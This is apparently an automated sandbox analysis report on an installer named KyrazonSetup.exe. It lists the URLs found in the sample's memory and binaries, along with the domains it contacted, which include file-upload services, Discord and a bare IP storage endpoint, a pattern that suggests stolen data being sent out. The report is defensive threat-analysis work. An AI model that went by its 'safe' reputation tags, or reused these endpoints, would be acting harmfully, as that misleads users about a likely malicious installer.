https://github.com/jrmuizel/qcms/tree/v40%Avira URL Cloudsafe
https://github.com/google/woff20%Avira URL Cloudsafe
https://github.com/google/sentencepiece0%Avira URL Cloudsafe
https://github.com/google/private-join-and-compute0%Avira URL Cloudsafe
https://eksempel.dk.Brug0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=sr&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
https://github.com/sponsors/broofa0%Avira URL Cloudsafe
https://github.com/aawc/unrar.git0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=cs&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
https://primer.com.Uporaba0%Avira URL Cloudsafe
https://github.com/google/re20%Avira URL Cloudsafe
https://android.googlesource.com/platform/external/setupdesign/0%Avira URL Cloudsafe
http://www.suitable.com/tools/smslib.html0%Avira URL Cloudsafe
https://github.com/tensorflow/models0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=lv&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
https://github.com/KhronosGroup/SPIRV-Headers.git0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=lt&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
https://github.com/tensorflow/tflite-support0%Avira URL Cloudsafe
http://www.webrtc.org0%Avira URL Cloudsafe
https://github.com/tensorflow/tensorflow0%Avira URL Cloudsafe
https://sqlite.org/0%Avira URL Cloudsafe
https://www.rfc-editor.org/rfc/rfc9562.html#name-example-of-a-uuidv7-value0%Avira URL Cloudsafe
http://www.suitable.com/tools/smslib.html>0%Avira URL Cloudsafe
https://github.com/KhronosGroup/Vulkan-Headers0%Avira URL Cloudsafe
https://github.com/sponsors/ljharb0%Avira URL Cloudsafe
https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl0%Avira URL Cloudsafe
http://www.opensource.org/licenses/bsd-license.php0%Avira URL Cloudsafe
https://github.com/Maratyszcza/pthreadpool0%Avira URL Cloudsafe
https://github.com/sponsors/sindresorhus0%Avira URL Cloudsafe
https://github.com/dominictarr/varstruct.git0%Avira URL Cloudsafe
https://github.com/Cyan4973/xxHash0%Avira URL Cloudsafe
https://github.com/puppeteer/puppeteer/tree/main/packages/puppeteer-core0%Avira URL Cloudsafe
http://www.ploscompbiol.org/static/license0%Avira URL Cloudsafe
https://github.com/google/xnnpack0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=fil&category=theme81https://myactivity.google.com/myactivity/?0%Avira URL Cloudsafe
https://support.google.com/chrome/a/answer/91222840%Avira URL Cloudsafe
http://www.chromium.org0%Avira URL Cloudsafe
https://www.unicode.org/copyright.html.0%Avira URL Cloudsafe
http://re-becca.org/)0%Avira URL Cloudsafe
http://freedesktop.org0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=he&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
http://ljharb.codes0%Avira URL Cloudsafe
https://www.rfc-editor.org/rfc/rfc9562.html#section-6.2-5.10%Avira URL Cloudsafe
https://developers.google.com/android/guides/setup0%Avira URL Cloudsafe
https://github.com/chalk/wrap-ansi?sponsor=10%Avira URL Cloudsafe
https://github.com/LiosK/UUID.js0%Avira URL Cloudsafe
https://github.com/KhronosGroup/Vulkan-Loader0%Avira URL Cloudsafe
https://github.com/uuidjs/uuid/pull/677#issuecomment-17573513510%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=ar&category=theme81https://myactivity.google.com/myactivity/?u0%Avira URL Cloudsafe
https://github.com/SeleniumHQ/selenium/tree/trunk0%Avira URL Cloudsafe
https://gitlab.freedesktop.org/xdg/xdgmime0%Avira URL Cloudsafe
http://www.strongtalk.org/0%Avira URL Cloudsafe
https://github.com/blueimp/JavaScript-MD50%Avira URL Cloudsafe
http://source.android.com/0%Avira URL Cloudsafe
http://cldr.unicode.org/index/downloads0%Avira URL Cloudsafe
https://github.com/google/ruy0%Avira URL Cloudsafe
https://github.com/google/shell-encryption0%Avira URL Cloudsafe
https://polymer-library.polymer-project.org0%Avira URL Cloudsafe
https://github.com/tensorflow/text.git0%Avira URL Cloudsafe
https://github.com/npm/wrappy0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		unknown
    file.io
    		45.55.107.24
    		truefalse
      		unknown
      discord.com
      		162.159.135.232
      		truefalse
        		unknown
        oshi.at
        		194.15.112.248
        		truefalse
          		unknown
          tempfile.me
          		193.37.215.73
          		truefalse
            		unknown
            api.gofile.io
            		51.38.43.18
            		truefalse
              		unknown
              zerostone.discloud.app
              		unknown
              		unknownfalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://92.246.138.20/storagefalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://chrome.google.com/webstore?hl=vi&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/iarna/wide-alignKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/simplejson/simplejsonKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Squirrel/Squirrel.MacKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://eksempel.dkKyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chromium.googlesource.com/vulkan-deps/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.google.com/chrome/answer/6098869?hl=esKyrazonSetup.exe, 00000000.00000003.1866565978.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/google/ukey2KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.google.com/chrome/answer/6098869KyrazonSetup.exe, 00000000.00000003.1868301732.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867607349.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867686588.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866823126.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868196976.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869169312.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867926612.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868755608.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868835634.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867450366.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868578913.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869852826.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870121124.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870648405.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/KhronosGroup/SPIRV-Tools.gitKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://webkit.org/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.freedesktop.org/wiki/Software/xdg-user-dirsKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://docs.python.org/library/uuid.htmlKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.apache.org/licenses/LICENSE-2.0KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://chrome.google.com/webstore?hl=ja&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1868008888.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://code.google.com/p/smhasher/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/sponsors/ctavanKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.linux-usb.org/usb-ids.htmlKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://tukaani.org/xz/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chrome.google.com/webstore?hl=pl&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrlKyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cppKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://passwords.google.comKyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867529465.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chrome.google.com/webstore?hl=sk&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://skia.org/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/google/diff-match-patch/tree/master/javascriptKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://opensource.perlig.de/rjsmin/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://android.googlesource.com/platform/external/puffinKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22KyrazonSetup.exe, 00000000.00000003.1868301732.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866823126.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869169312.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867926612.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868835634.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870648405.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866034713.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866565978.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869679539.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867529465.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869316179.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870484257.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870744650.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/google/pprof/tree/master/protoKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chrome.google.com/webstore?hl=ur&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/jrmuizel/qcms/tree/v4KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.movable-type.co.uk/scripts/sha1.htmlKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chromium.googlesource.com/chromium/src/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/google/woff2KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://blog.izs.me)KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/google/sentencepieceKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/google/private-join-and-computeKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://eksempel.dk.BrugKyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/sponsors/broofaKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chrome.google.com/webstore?hl=cs&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chrome.google.com/webstore?hl=sr&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1869594991.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://primer.com.UporabaKyrazonSetup.exe, 00000000.00000003.1869513927.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/aawc/unrar.gitKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://android.googlesource.com/platform/external/setupdesign/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/google/re2KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/tensorflow/modelsKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.suitable.com/tools/smslib.htmlKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/KhronosGroup/SPIRV-Headers.gitKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.apache.org/licenses/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://chrome.google.com/webstore?hl=lv&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nsis.sf.net/NSIS_ErrorErrorKyrazonSetup.exe, 00000000.00000000.1642686865.000000000040A000.00000008.00000001.01000000.00000003.sdmp, KyrazonSetup.exe, 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.rfc-editor.org/rfc/rfc9562.html#name-example-of-a-uuidv7-valueKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chrome.google.com/webstore?hl=lt&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.suitable.com/tools/smslib.html>KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/tensorflow/tflite-supportKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/tensorflow/tensorflowKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.webrtc.orgKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://blueimp.netKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://sqlite.org/KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/KhronosGroup/Vulkan-HeadersKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrlKyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/dominictarr/varstruct.gitKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/sponsors/ljharbKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nsis.sf.net/NSIS_ErrorKyrazonSetup.exe, KyrazonSetup.exe, 00000000.00000000.1642686865.000000000040A000.00000008.00000001.01000000.00000003.sdmp, KyrazonSetup.exe, 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://github.com/Cyan4973/xxHashKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Maratyszcza/pthreadpoolKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.opensource.org/licenses/bsd-license.phpKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/sponsors/sindresorhusKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ploscompbiol.org/static/licenseKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/google/xnnpackKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/puppeteer/puppeteer/tree/main/packages/puppeteer-coreKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.google.com/chrome/a/answer/9122284KyrazonSetup.exe, 00000000.00000003.1868301732.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867607349.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867686588.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866823126.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868196976.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869169312.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867926612.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868835634.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867450366.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868578913.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870121124.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870648405.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866034713.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866565978.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chrome.google.com/webstore?hl=fil&category=theme81https://myactivity.google.com/myactivity/?KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.chromium.orgKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.unicode.org/copyright.html.KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://freedesktop.orgKyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://re-becca.org/)KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://chrome.google.com/webstore?hl=he&category=theme81https://myactivity.google.com/myactivity/?uKyrazonSetup.exe, 00000000.00000003.1867529465.000000000078C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://ljharb.codesKyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpfalse
